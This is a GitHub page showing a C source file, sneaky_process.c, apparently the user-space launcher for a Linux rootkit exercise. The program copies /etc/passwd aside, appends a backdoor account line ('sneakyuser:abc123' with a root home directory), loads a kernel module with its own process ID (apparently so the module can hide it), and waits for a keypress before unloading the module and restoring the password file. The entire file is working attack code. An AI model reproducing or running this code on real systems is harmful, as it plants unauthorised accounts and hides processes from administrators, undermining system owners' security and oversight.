sneaky-process/sneaky_process.c at main · charlieprior/sneaky-process · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <termios.h>

int main() {
    printf("sneaky_process pid = %d\n", getpid());

    // Copy password file
    if(fork() == 0) {
        execl("/usr/bin/cp", "/usr/bin/cp", "/etc/passwd", "/tmp/passwd", (char*)NULL);
    }
    wait(NULL);
    printf("Copied password file\n");

    // Append line
    FILE * passwordFile = fopen("/etc/passwd", "a");
    fprintf(passwordFile, "sneakyuser:abc123:2000:2000:sneakyuser:/root:bash\n");
    fclose(passwordFile);
    printf("Appended line to password file\n");

    // Load module
    char arg[20];
    sprintf(arg, "pid=%d", getpid());
    if(fork() == 0) {
        execl("/usr/sbin/insmod", "/usr/sbin/insmod", "sneaky_mod.ko", arg, (char*)NULL);
    }
    wait(NULL);
    printf("Loaded module\n");

    // Enter loop
    static struct termios oldt, newt;
    tcgetattr(STDIN_FILENO, &oldt);
    newt = oldt;
    newt.c_lflag &= ~(ICANON);
    tcsetattr(STDIN_FILENO, TCSANOW, &newt);
    while(getchar() != 'q') {}
    tcsetattr(STDIN_FILENO, TCSANOW, &oldt);

    // Unload module
    if(fork() == 0) {
        execl("/usr/sbin/rmmod", "/usr/sbin/rmmod", "sneaky_mod", (char*)NULL);
    }
    wait(NULL);
    printf("Unloaded module\n");

    // Restore password file
    if(fork() == 0) {
        execl("/usr/bin/cp", "/usr/bin/cp", "/tmp/passwd", "/etc/passwd", (char*)NULL);
    }
    wait(NULL);
    printf("Restored password file\n");


    // Delete temporary password file
    if(fork() == 0) {
        execl("/usr/bin/rm", "/usr/bin/rm", "-f", "/tmp/passwd", (char*)NULL);
    }
    wait(NULL);
    printf("Deleted temporary password file\n");


    return EXIT_SUCCESS;
}